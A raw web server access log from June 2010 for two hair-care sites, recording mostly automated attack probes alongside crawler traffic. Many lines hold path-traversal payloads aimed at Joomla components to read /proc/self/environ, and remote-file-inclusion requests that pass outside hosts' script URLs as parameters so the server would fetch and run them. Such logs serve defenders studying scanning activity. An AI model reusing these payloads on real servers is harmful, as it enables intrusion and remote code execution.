74.124.198.60 - - [21/Jun/2010:09:37:34 -0700] "GET /logs/access.log/*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:09:37:34 -0700] "GET /*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:09:37:34 -0700] "GET /*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:09:37:34 -0700] "GET /logs/*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:09:37:34 -0700] "GET /logs/*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:09:38:11 -0700] "GET /logs/access.log/*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
74.124.198.60 - - [21/Jun/2010:09:38:11 -0700] "GET /logs/access.log/*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
74.124.198.60 - - [21/Jun/2010:09:38:11 -0700] "GET /*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
74.124.198.60 - - [21/Jun/2010:09:38:11 -0700] "GET /*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
74.124.198.60 - - [21/Jun/2010:09:38:11 -0700] "GET /logs/*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
74.124.198.60 - - [21/Jun/2010:09:38:11 -0700] "GET /logs/*.?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
79.174.68.88 - - [21/Jun/2010:09:39:52 -0700] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
79.174.68.88 - - [21/Jun/2010:09:39:52 -0700] "GET /logs/access.log%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
79.174.68.88 - - [21/Jun/2010:09:39:52 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
79.174.68.88 - - [21/Jun/2010:09:39:52 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.174.68.88 - - [21/Jun/2010:09:39:52 -0700] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.174.68.88 - - [21/Jun/2010:09:39:52 -0700] "GET /logs/access_100531.log%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.168.25.206 - - [21/Jun/2010:09:45:38 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
67.195.37.176 - - [21/Jun/2010:09:48:25 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [21/Jun/2010:09:48:30 -0700] "GET /logs/access_100524.log HTTP/1.0" 200 2784909 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [21/Jun/2010:09:48:34 -0700] "GET /logs/access_100503.log HTTP/1.0" 200 2519989 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [21/Jun/2010:09:48:55 -0700] "GET /logs/access_100531.log HTTP/1.0" 200 3581898 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
195.168.25.206 - - [21/Jun/2010:09:49:01 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
195.168.25.206 - - [21/Jun/2010:09:49:10 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
195.168.25.206 - - [21/Jun/2010:09:49:11 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
195.168.25.206 - - [21/Jun/2010:09:49:11 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
67.195.37.176 - - [21/Jun/2010:09:49:12 -0700] "GET /logs/access_100510.log HTTP/1.0" 200 2798780 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [21/Jun/2010:09:49:20 -0700] "GET /logs/access_100426.log HTTP/1.0" 200 2491092 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
195.168.25.206 - - [21/Jun/2010:09:49:21 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
95.50.85.99 - - [21/Jun/2010:09:50:49 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
95.50.85.99 - - [21/Jun/2010:09:50:49 -0700] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
95.50.85.99 - - [21/Jun/2010:09:50:49 -0700] "GET /logs/access_100531.log%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
95.50.85.99 - - [21/Jun/2010:09:50:49 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
95.50.85.99 - - [21/Jun/2010:09:50:49 -0700] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
95.50.85.99 - - [21/Jun/2010:09:50:49 -0700] "GET /logs/access.log%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.214.44.233 - - [21/Jun/2010:09:51:37 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.freehairsecrets.com"
91.214.44.233 - - [21/Jun/2010:09:51:37 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.freehairsecrets.com"
91.214.44.233 - - [21/Jun/2010:09:53:19 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Babya Discoverer 8.0:" "www.freehairsecrets.com"
91.214.44.233 - - [21/Jun/2010:09:53:19 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Babya Discoverer 8.0:" "www.freehairsecrets.com"
66.76.26.88 - - [21/Jun/2010:09:54:55 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.76.26.88 - - [21/Jun/2010:09:54:55 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.76.26.88 - - [21/Jun/2010:09:54:56 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.174.68.88 - - [21/Jun/2010:09:56:59 -0700] "GET /logs/access.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
95.50.85.99 - - [21/Jun/2010:09:57:00 -0700] "GET /logs/access_100503.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.114.238 - - [21/Jun/2010:09:57:42 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
67.195.114.238 - - [21/Jun/2010:09:57:42 -0700] "GET /tmp/?S=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
95.50.85.99 - - [21/Jun/2010:09:57:45 -0700] "GET /logs/access.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.37.176 - - [21/Jun/2010:09:57:57 -0700] "GET /logs/ HTTP/1.0" 200 6070 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [21/Jun/2010:10:00:06 -0700] "GET /logs/access_100614.log HTTP/1.0" 200 3596831 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:10:00:42 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:10:00:42 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
195.168.25.206 - - [21/Jun/2010:10:01:42 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
195.168.25.206 - - [21/Jun/2010:10:01:42 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
195.168.25.206 - - [21/Jun/2010:10:01:42 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
200.175.239.226 - - [21/Jun/2010:10:06:23 -0700] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.175.239.226 - - [21/Jun/2010:10:06:23 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.175.239.226 - - [21/Jun/2010:10:06:23 -0700] "GET /logs/access_100531.log%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.175.239.226 - - [21/Jun/2010:10:06:23 -0700] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.175.239.226 - - [21/Jun/2010:10:06:23 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.175.239.226 - - [21/Jun/2010:10:06:23 -0700] "GET /logs/access.log%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
75.125.138.2 - - [21/Jun/2010:10:07:20 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
75.125.138.2 - - [21/Jun/2010:10:07:20 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
75.125.138.2 - - [21/Jun/2010:10:07:20 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
75.125.138.2 - - [21/Jun/2010:10:07:25 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:10:07:25 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:10:07:25 -0700] "GET /logs/access_100322.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
203.19.4.18 - - [21/Jun/2010:10:07:37 -0700] "GET /?option=com_gcalendar&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "growlonghairfast.com"
195.168.25.206 - - [21/Jun/2010:10:07:41 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.168.25.206 - - [21/Jun/2010:10:07:41 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.168.25.206 - - [21/Jun/2010:10:07:41 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:10:08:17 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
75.125.138.2 - - [21/Jun/2010:10:08:17 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
75.125.138.2 - - [21/Jun/2010:10:08:17 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
75.125.138.2 - - [21/Jun/2010:10:08:24 -0700] "GET /logs/access_100322.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:10:08:24 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:10:08:24 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.218.209.178 - - [21/Jun/2010:10:11:33 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
207.218.209.178 - - [21/Jun/2010:10:11:33 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
207.218.209.178 - - [21/Jun/2010:10:11:33 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.186.192.124 - - [21/Jun/2010:10:12:31 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.porto.napoli.it/tt/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.186.192.124 - - [21/Jun/2010:10:12:31 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.porto.napoli.it/tt/p1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.186.192.124 - - [21/Jun/2010:10:12:31 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.porto.napoli.it/tt/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.186.192.124 - - [21/Jun/2010:10:12:31 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.porto.napoli.it/tt/p1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.186.192.124 - - [21/Jun/2010:10:12:31 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.porto.napoli.it/tt/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.186.192.124 - - [21/Jun/2010:10:12:31 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.porto.napoli.it/tt/p1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
89.248.168.156 - - [21/Jun/2010:10:14:23 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT) ::ELNSB50::000061100320025802a00111000000000507000900000000" "www.freehairsecrets.com"
89.248.168.156 - - [21/Jun/2010:10:14:23 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT) ::ELNSB50::000061100320025802a00111000000000507000900000000" "www.freehairsecrets.com"
174.37.19.40 - - [21/Jun/2010:10:17:59 -0700] "GET /pmserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
203.19.4.18 - - [21/Jun/2010:10:19:02 -0700] "GET /?option=com_gcalendar&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "www.freehairsecrets.com"
201.36.173.93 - - [21/Jun/2010:10:22:05 -0700] "GET /logs/access_100531.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
201.36.173.93 - - [21/Jun/2010:10:22:06 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
201.36.173.93 - - [21/Jun/2010:10:22:12 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
201.36.173.93 - - [21/Jun/2010:10:22:27 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
183.180.127.14 - - [21/Jun/2010:10:22:29 -0700] "GET /pmserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
201.36.173.93 - - [21/Jun/2010:10:22:35 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
201.36.173.93 - - [21/Jun/2010:10:22:37 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
93.186.192.124 - - [21/Jun/2010:10:23:16 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.porto.napoli.it/tt/p1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.186.192.124 - - [21/Jun/2010:10:23:54 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.porto.napoli.it/tt/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.64.91.113 - - [21/Jun/2010:10:25:52 -0700] "GET /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:25:52 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:25:53 -0700] "GET /logs/pingserver.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.91.250.11 - - [21/Jun/2010:10:29:36 -0700] "GET /logs/access.log%20%20/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.91.250.11 - - [21/Jun/2010:10:29:36 -0700] "GET /errors.php?error=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.91.250.11 - - [21/Jun/2010:10:29:36 -0700] "GET /logs/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.91.250.11 - - [21/Jun/2010:10:29:44 -0700] "GET /logs/access.log%20%20/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.91.250.11 - - [21/Jun/2010:10:29:44 -0700] "GET /logs/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.91.250.11 - - [21/Jun/2010:10:29:44 -0700] "GET /errors.php?error=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [21/Jun/2010:10:30:25 -0700] "GET /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:10:30:25 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:10:30:26 -0700] "GET /logs/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:10:30:27 -0700] "GET /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:10:30:27 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:10:30:27 -0700] "GET /logs/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
85.235.154.15 - - [21/Jun/2010:10:32:15 -0700] "GET /?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "growlonghairfast.com"
85.235.154.15 - - [21/Jun/2010:10:33:29 -0700] "GET /?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "www.freehairsecrets.com"
85.235.154.15 - - [21/Jun/2010:10:34:43 -0700] "GET /?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:36:11 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.freehairsecrets.com"
85.235.154.15 - - [21/Jun/2010:10:36:17 -0700] "GET /?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "www.freehairsecrets.com"
206.214.220.151 - - [21/Jun/2010:10:36:26 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
69.64.91.113 - - [21/Jun/2010:10:36:27 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "growlonghairfast.com"
69.64.91.113 - - [21/Jun/2010:10:36:28 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.freehairsecrets.com"
69.64.91.113 - - [21/Jun/2010:10:36:31 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.828" "www.freehairsecrets.com"
206.214.220.151 - - [21/Jun/2010:10:36:33 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
206.214.220.151 - - [21/Jun/2010:10:36:33 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
